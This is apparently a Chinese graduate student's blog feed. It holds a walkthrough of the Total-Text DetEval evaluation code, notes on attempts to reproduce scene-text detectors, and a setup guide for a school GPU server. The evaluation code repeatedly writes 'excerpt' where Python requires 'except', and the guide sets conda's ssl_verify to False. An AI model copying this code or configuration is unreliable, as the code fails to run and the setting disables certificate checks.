    这段代码定义了一些全局变量 global_tpglobal_fpglobal_fnglobal_sigmaglobal_tau,并给它们分别赋初值0和空列表。

    其中,global_tp 表示全局的真正例数量(True Positive),global_fp 表示全局的假正例数量(False Positive),global_fn 表示全局的假负例数量(False Negative),global_sigma 表示全局的重叠度(sigma)列表,global_tau 表示全局的重叠度(tau)列表。

    接下来,代码定义了一些参数:tr 表示阈值,tp 表示真正例比例阈值,fsc_k 表示 F1 分数的参数 k,k 表示一个系数。

    这段代码仅仅给这些变量和参数赋了初值,并没有其他具体的逻辑操作。

    • 评估
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
    input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
    and (input_id != 'Deteval_result_non_curved.txt'):
    # print(input_id)
    detections = input_reading_mod(input_dir, input_id)
    groundtruths = gt_reading_mod(gt_dir, input_id)
    detections = detection_filtering(detections, groundtruths) # filters detections overlapping with DC area
    dc_id = np.where(groundtruths[:, 5] == '#')
    groundtruths = np.delete(groundtruths, (dc_id), (0))

    local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
    local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

    for gt_id, gt in enumerate(groundtruths):
    if len(detections) > 0:
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))

    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

    global_sigma.append(local_sigma_table)
    global_tau.append(local_tau_table)

    global_accumulative_recall = 0
    global_accumulative_precision = 0
    total_num_gt = 0
    total_num_det = 0

    这段代码通过一个 for 循环遍历名为 allInputs 的列表中的每个元素 input_id

    在循环内部,首先使用一系列条件语句来过滤掉一些特定的 input_id,包括 .DS_StorePascal_result.txt 等等。然后调用 input_reading_mod 函数从 input_dir 目录中读取输入数据,调用 gt_reading_mod 函数从 gt_dir 目录中读取标注数据。

    接下来,通过调用 detection_filtering 函数对检测结果进行过滤,去掉与 DC 区域重叠的检测结果。然后找到标注数据中 DC 区域对应的索引,并通过 np.delete 函数将其从标注数据中删除。

    接着,创建了两个零矩阵 local_sigma_tablelocal_tau_table,形状分别为 (groundtruths.shape[0], len(detections)),用来存储每个标注和检测结果之间的重叠度信息。

    接下来的两个嵌套的 for 循环用于计算每个标注和检测结果之间的重叠度。首先解析检测结果和标注数据的坐标信息,并调用 sigma_calculationtau_calculation 函数来计算重叠度。将计算得到的重叠度存储在 local_sigma_tablelocal_tau_table 中。

    最后,将 local_sigma_tablelocal_tau_table 分别添加到 global_sigmaglobal_tau 列表中,用于保存所有标注和检测结果之间的重叠度信息。

    代码的最后几行定义了一些变量,包括 global_accumulative_recallglobal_accumulative_precisiontotal_num_gttotal_num_det,并给它们赋初值 0。这些变量可能在后续代码中使用。

    • one_to_one()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
    gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
    gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
    gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

    det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
    det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
    det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
    det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]


    if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
    (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
    det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_one 的函数,它接受多个参数,包括 local_sigma_tablelocal_tau_tablelocal_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    在循环内部,首先使用 np.where 函数找到满足条件 local_sigma_table[gt_id, :] > tr 的索引,然后计算满足条件的索引数量,并分别保存在 gt_matching_num_qualified_sigma_candidatesgt_matching_qualified_tau_candidates 变量中。

    接着,再次使用 np.where 函数找到与上述条件对应的检测结果的索引,并计算满足条件的索引数量,分别保存在 det_matching_num_qualified_sigma_candidatesdet_matching_num_qualified_tau_candidates 变量中。

    之后,通过一系列的条件判断,检查是否满足"一对一"匹配的条件,即只有一个满足重叠度阈值要求的标注和一个满足重叠度阈值要求的检测结果。如果满足这些条件,则更新相关计数变量,并将相应的标志位设置为1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • one_to_many()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    #skip the following if the groundtruth was matched
    if gt_flag[0, gt_id] > 0:
    continue

    non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
    num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

    if num_non_zero_in_sigma >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
    num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

    if num_qualified_tau_candidates == 1:
    if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1
    elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + fsc_k
    global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

    local_accumulative_recall = local_accumulative_recall + fsc_k
    local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_many 的函数,它与之前的 one_to_one 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    在循环内部,首先检查是否已经匹配过该标注数据,如果 gt_flag[0, gt_id] 大于 0,则表示已进行匹配,直接跳过后续操作。

    接下来,使用 np.where 函数找到满足条件 local_sigma_table[gt_id, :] > 0 的索引,并计算满足条件的索引数量,保存在 num_non_zero_in_sigma 变量中。

    然后,如果满足条件 num_non_zero_in_sigma >= k,进入下一步操作。

    在下一步操作中,通过np.where函数找到满足条件 (local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0) 的索引,并计算满足条件的索引数量,保存在 num_qualified_tau_candidates 变量中。

    接着,判断 num_qualified_tau_candidates 的值,如果为 1,则进一步判断该标注和对应的检测结果是否满足"一对一"匹配的条件,即重叠度要求同时满足。如果满足条件,则更新相关计数变量,并将相应的标志位设置为1。

    如果 num_qualified_tau_candidates 的值大于 1,并且满足条件 np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr,则将相关计数变量更新,并将标志位设置为 1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • many_to_one()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for det_id in range(num_det):
    # skip the following if the detection was matched
    if det_flag[0, det_id] > 0:
    continue

    non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
    num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

    if num_non_zero_in_tau >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
    num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

    if num_qualified_sigma_candidates == 1:
    if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, qualified_sigma_candidates] = 1
    det_flag[0, det_id] = 1
    elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
    det_flag[0, det_id] = 1
    gt_flag[0, qualified_sigma_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    global_accumulative_precision = global_accumulative_precision + fsc_k

    local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 many_to_one 的函数,与之前的 one_to_oneone_to_many 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_det 的每个 det_id,其中 num_det 是检测结果的数量。

    在循环内部,首先检查是否已经匹配过该检测结果,如果 det_flag[0, det_id] 大于 0,则表示已进行匹配,直接跳过后续操作。

    接下来,使用 np.where 函数找到满足条件 local_tau_table[:, det_id] > 0 的索引,并计算满足条件的索引数量,保存在 num_non_zero_in_tau 变量中。

    然后,如果满足条件 num_non_zero_in_tau >= k,进入下一步操作。

    在下一步操作中,通过 np.where 函数找到满足条件 (local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0) 的索引,并计算满足条件的索引数量,保存在 num_qualified_sigma_candidates 变量中。

    接着,判断 num_qualified_sigma_candidates 的值,如果为 1,则进一步判断该检测结果和对应的标注数据是否满足"一对一"匹配的条件,即重叠度和重合度要求同时满足。如果满足条件,则更新相关计数变量,并将相应的标志位设置为 1。

    如果 num_qualified_sigma_candidates 的值大于 1,并且满足条件 np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp,则将相关计数变量更新,并将标志位设置为 1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • 保存结果
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)




    fid = open(fid_path, 'a+')
    try:
    local_precision = local_accumulative_precision / num_det
    excerpt ZeroDivisionError:
    local_precision = 0

    try:
    local_recall = local_accumulative_recall / num_gt
    excerpt ZeroDivisionError:
    local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()
    try:
    recall = global_accumulative_recall / total_num_gt
    excerpt ZeroDivisionError:
    recall = 0

    try:
    precision = global_accumulative_precision / total_num_det
    excerpt ZeroDivisionError:
    precision = 0

    try:
    f_score = 2*precision*recall/(precision+recall)
    excerpt ZeroDivisionError:
    f_score = 0

    fid = open(fid_path, 'a')
    temp = ('Precision:_%s_______/Recall:_%s\n' %(str(precision), str(recall)))
    fid.write(temp)
    fid.close()
    print(temp)

    这段代码是一个循环,循环遍历 global_sigma 列表中的每个元素。

    在每次循环中,首先打印 allInputs[idx] 的值,然后将 global_sigma[idx] 赋值给 local_sigma_table,将 global_tau[idx] 赋值给 local_tau_table

    接下来,计算 local_sigma_table 的形状,并将结果分别赋值给 num_gtnum_det

    然后,将 num_gtnum_det 加到累计变量 total_num_gttotal_num_det 上。

    接着,初始化一些变量,包括 local_accumulative_recalllocal_accumulative_precisiongt_flagdet_flag

    然后,依次调用 one_to_oneone_to_manymany_to_one 函数,对 local_sigma_tablelocal_tau_table 进行匹配计算,并更新相关计数变量和标志位。

    接下来,打开一个文件,并将 local_accumulative_precisionlocal_precision 计算结果写入文件。

    Pascal VOC

    ​ 传统的 $0.5$ 阈值。


    ​ 提供了两种语言:Matlab 和 Python,只有 Matlab 的有示例……Python 的没有,绝

    png

    Groundtruth

    ​ 可提供的 GT:

    • Pixel 级

      • Character Level Mask

        • The pixel level groundtruth of Total-Text dataset can be downloaded at this https URL (80Mb).

        gif

      • Text Region Mask

        • The text region mask groundtruth of Total-Text dataset can be downloaded at this https URL (6Mb).

        gif

    • Text 级

      png

    计划(寄)

    ​ 复现一下 Total-Text Benchmark (Scene Text Detection) | Papers With Codecs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com) 里的代码。

    ​ 真是太难复现了我日。

    ​ 尝试过的/打算尝试的:

    ModelF-MeasurePrecisionRecallPaperGitHub备注
    CentripetalText87.85%90.6785.19CentripetalText: An Efficient Text Instance Representation for Scene Text Detection Papers With Codeshengtao96/CentripetalText (github.com)默认的 Total-Text 形式
    FCE89.382.585.8GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer;The paper at: https://arxiv.org/abs/2205.05320, which has been accepted by IEEE Transactions on Multimedia (T-MM 2023). (github.com)GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer;The paper at: https://arxiv.org/abs/2205.05320, which has been accepted by IEEE Transactions on Multimedia (T-MM 2023). (github.com)默认的 Total-Text 形式
    DPText-DETR
    (ResNet-50)
    87.3%82.193.1[2211.10772] DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting (arxiv.org)[ViTAE-Transformer/DeepSolo: The official repo for CVPR’23] “DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting” & [ArXiv’23] “DeepSolo++: Let Transformer Decoder with Explicit Points Solo for Text Spotting” (github.com)Total-Text 的形式不同于默认形式(复杂的 json 文件)
    FAST-B-80087.5%90.085.2[2111.02394v2] FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (arxiv.org)czczup/FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (github.com)sh ./compile.sh 编译失败,寄!
    TextFuseNet
    (ResNeXt-101)
    87.5%89.285.8TextFuseNet: Scene Text Detection with Richer Fused Features Papers With Codeying09/TextFuseNet: A PyTorch implementation of “TextFuseNet: Scene Text Detection with Richer Fused Features”. (github.com)
    I3CL + SSL
    (ResNet-50)
    86.9%89.884.2I3CL + SSL
    (ResNet-50)
    ViTAE-Transformer/I3CL: The official repo for [IJCV’22] “I3CL: Intra- and Inter-Instance Collaborative Learning for Arbitrary-shaped Scene Text Detection” (github.com)仓库里好像没有适配 Total-Text 的
    CharNet H-88 (multi-scale)86.5%8885Convolutional Character Networks Papers With Codemsight-tech/research-charnet: CharNet: Convolutional Character Networks (github.com)仓库里好像没有适配 Total-Text 的,只有 ICDAR2015
    DBNet++
    (ResNet-50)
    86%88.983.2Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion Papers With CodeMhLiao/DB: A PyTorch implementation of “Real-time Scene Text Detection with Differentiable Binarization”. (github.com)Total-Text 的形式不同于默认形式(较易懂的 txt 形式)
    PAN-64085%89.381Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network Papers With CodeWenmuZhou/PAN.pytorch: A unofficial pytorch implementation of PAN(PSENet2): Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network (github.com)仓库里好像没有适配 Total-Text 的,只有 ICDAR2015
    DB-ResNet-50 (800)84.7%Real-time Scene Text Detection with Differentiable Binarization Papers With CodeMhLiao/DB: A PyTorch implementation of “Real-time Scene Text Detection with Differentiable Binarization”. (github.com)Total-Text 的形式不同于默认形式(较易懂的 txt 形式)
    CRAFT83.6%87.679.9Character Region Awareness for Text Detection Papers With Codeclovaai/CRAFT-pytorch: Official implementation of Character Region Awareness for Text Detection (CRAFT) (github.com)仓库里好像没有适配 Total-Text 的
    TextSnake78.4%82.774.5TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes Papers With Codeprincewang1994/TextSnake.pytorch: A PyTorch implementation of ECCV2018 Paper: TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes (github.com)Total-Text 的形式不同于默认形式

    可视化数据集

    ​ 根据数据集的源图像以及它的 txt 标注格式,再一阵 ChatGPT 和一阵操作,写一个可视化代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 396

    image_dir = r'E:\dataset\TotalText\Images\Test\\'
    label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ]]>
    @@ -5916,10 +5916,10 @@ 碎碎念 - 研一暑假 - 暑假 + 研一暑假 + @@ -5931,7 +5931,7 @@ /posts/Diary-%E6%9C%80%E5%90%8E%E7%9A%84%E7%AC%AC%2019%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -5958,7 +5958,7 @@ /posts/Diary-%E5%8F%88%E9%97%BD%E4%BA%86/ -
    ]]>
    +
    ]]>
    @@ -5987,7 +5987,7 @@ /posts/Server-%E5%AD%A6%E6%A0%A1%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9B%B8%E5%85%B3/ - 正文

    准备

    png

    ​ 下载 MobaXterm:https://en.softonic.com/download/moba/windows/post-download

    登录

    ​ MobaXterm 下 Session,打开 Session settingsRemote host 中输入 10.188.65.154Specify username 中输入自己的用户名,Port22,不变。

    Remote environment 默认选择的是 Interactive shell,如果选择 Gnome desktop 则会打开 Ubuntu 的可视化界面。

    png

    png

    ​ 进服务器:

    png

    常见命令

    who

    ​ 查看现在谁在线:

    who
    伟哥   pts/0        2023-06-24 09:53 (10.62.62.XXX)
    伟哥 pts/1 2023-06-24 09:59 (10.62.62.XXX)
    伟哥 pts/2 2023-06-25 08:26 (10.62.62.XXX)
    guanz pts/3 2023-06-25 19:43 (10.91.140.XXX)
    伟哥 pts/4 2023-06-23 08:17 (10.62.62.XXX)
    伟哥 pts/5 2023-06-23 15:48 (10.62.62.XXX)
    伟哥 pts/6 2023-06-23 15:36 (10.61.20.XXX)
    伟哥 pts/8 2023-06-23 15:56 (10.61.20.XXX)

    nvidia-smi

    ​ 查看显卡状态:

    nvidia-smi
    Sun Jun 25 20:11:14 2023
    +-----------------------------------------------------------------------------+
    | NVIDIA-SMI 510.85.02 Driver Version: 510.85.02 CUDA Version: 11.6 |
    |-------------------------------+----------------------+----------------------+
    | GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
    | Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
    | | | MIG M. |
    |===============================+======================+======================|
    | 0 NVIDIA GeForce ... Off | 00000000:65:00.0 Off | N/A |
    | 30% 58C P2 104W / 320W | 9514MiB / 10240MiB | 19% Default |
    | | | N/A |
    +-------------------------------+----------------------+----------------------+

    +-----------------------------------------------------------------------------+
    | Processes: |
    | GPU GI CI PID Type Process name GPU Memory |
    | ID ID Usage |
    |=============================================================================|
    | 0 N/A N/A 1348 G /usr/lib/xorg/Xorg 9MiB |
    | 0 N/A N/A 1614 G /usr/bin/gnome-shell 6MiB |
    | 0 N/A N/A 3562342 C python 5767MiB |
    | 0 N/A N/A 3567780 C python 3727MiB |
    +-----------------------------------------------------------------------------+

    ps

    ​ 可以看到 PID 3562342 在使用,查看使用用户:

    ps -f -p 3562342
    UID          PID    PPID  C STIME TTY          TIME CMD
    伟哥 3562342 3542160 99 09:33 ? 10:42:43 python occupyGPU_5G.py

    服务器联网

    firefox

    ​ 登陆校园网,打开火狐浏览器:

    firefox

    ​ 地址栏输入 202.206.1.231,登录校园网,即可联网。

    png

    ping

    ​ 检查服务器是否连上校园网:

    ping www.baidu.com
    PING www.a.shifen.com (220.181.38.150) 56(84) bytes of data.
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=1 ttl=51 时间=9.12 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=2 ttl=51 时间=9.05 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=3 ttl=51 时间=9.02 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=4 ttl=51 时间=9.03 毫秒

    服务器上安装 anaconda

    ​ 从 Index of /anaconda/archive/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror 里下载想要的 conda 版本:Anaconda3-2023.03-Linux-x86_64.sh,拷贝到服务器目录:

    png

    ​ 卸载旧的 Anaconda:

    rm -rf ~/anaconda3

    ​ 删除其它文件:

    rm -rf ~/.condarc ~/.conda

    ​ 安装之:

    chmod u+x Anaconda3-2023.03-Linux-x86_64.sh
    bash ./Anaconda3-2023.03-Linux-x86_64.sh

    ​ 修正 .bashrc 中有关 conda 的部分:

    export PATH=$PATH:/usr/bin/:$PATH
    # >>> conda initialize >>>
    # !! Contents within this block are managed by 'conda init' !!
    __conda_setup="$('/home/guanz/anaconda3/bin/conda' 'shell.bash' 'hook' 2> /dev/null)"
    if [ $? -eq 0 ]; then
    eval "$__conda_setup"
    else
    if [ -f "/home/guanz/anaconda3/etc/profile.d/conda.sh" ]; then
    . "/home/guanz/anaconda3/etc/profile.d/conda.sh" # commented out by conda initialize
    else
    export PATH="/home/zhij/anaconda3/bin:$PATH" # commented out by conda initialize
    fi
    fi
    unset __conda_setup

    ​ 从根目录下 .condarc 下设置镜像(写博客的这天清华镜像好像寄了,换阿里):

    ssl_verify: False
    channels:
    - https://mirrors.aliyun.com/anaconda/pkgs/free/
    - https://mirrors.aliyun.com/anaconda/pkgs/main/
    show_channel_urls: True

    在服务器安装 conda 环境

    conda create

    ​ 设置好镜像后,此时才可以创建虚拟环境,不然容易寄。

    conda create -n blender python=3.9

    conda info --envs

    ​ 查看环境信息:

    conda info --envs
    # conda environments:
    #
    base * /home/guanz/anaconda3
    SRNet /home/guanz/anaconda3/envs/SRNet
    blender /home/guanz/anaconda3/envs/blender

    conda remove

    ​ 移除某个环境:

    conda remove -n XXX --all

    pip install

    pip install pillow -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​ 如果清华镜像寄了,就试试阿里镜像:

    pip install pillow -i https://mirrors.aliyun.com/pypi/simple/

    将本地环境迁移到服务器上

    ​ 如果在学校服务器上安装环境过于麻烦,可以考虑在 win11 下的 ubuntu 子系统下先装好对应的环境,然后将这个环境迁移至服务器上,我们以一个 pytorch 的环境为例。


    ​ 先在本机上整一个带 pytorch 1.13.1,cuda 11.6 的镜像(学校的服务器 cuda 是 11.6 的)

    ​ 从 download.pytorch.org/whl/torch_stable.html 下载 torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whltorchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl

    conda create -n pytorch python=3.9
    conda activate pytorch
    pip install torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/
    pip install torchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/

    conda pack

    ​ 将虚拟环境 pytorch 打包成 pytorch.tar.gz 并保存到当前目录中。

    conda pack -n pytorch -o pytorch.tar.gz

    将生成的 pytorch.tar.gz 拷贝到服务器。

    ​ 在服务器根目录下:

    cd ./anaconda3/envs
    mkdir -p pytorch

    ​ 将 pytorch.tar.gz 里的内容解压到 ./anaconda3/envs/pytorch/ 中:

    tar -xzf ../../pytorch.tar.gz -C pytorch

    ​ 查看是否迁移完成:

    conda env list
    base                  *  /home/guanz/anaconda3
    pytorch /home/guanz/anaconda3/envs/pytorch

    ​ 查看环境是否可以使用:

    python
    Python 3.9.16 (main, May 15 2023, 23:46:34)
    [GCC 11.2.0] :: Anaconda, Inc. on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import torch
    >>> import torchvision
    >>> torch.cuda.is_available()
    True

    PyCharm 连接服务器

    ​ 新建一个项目testGpu,里面有一个 .py 文件 testGpu.py

    import torch

    flag = torch.cuda.is_available()
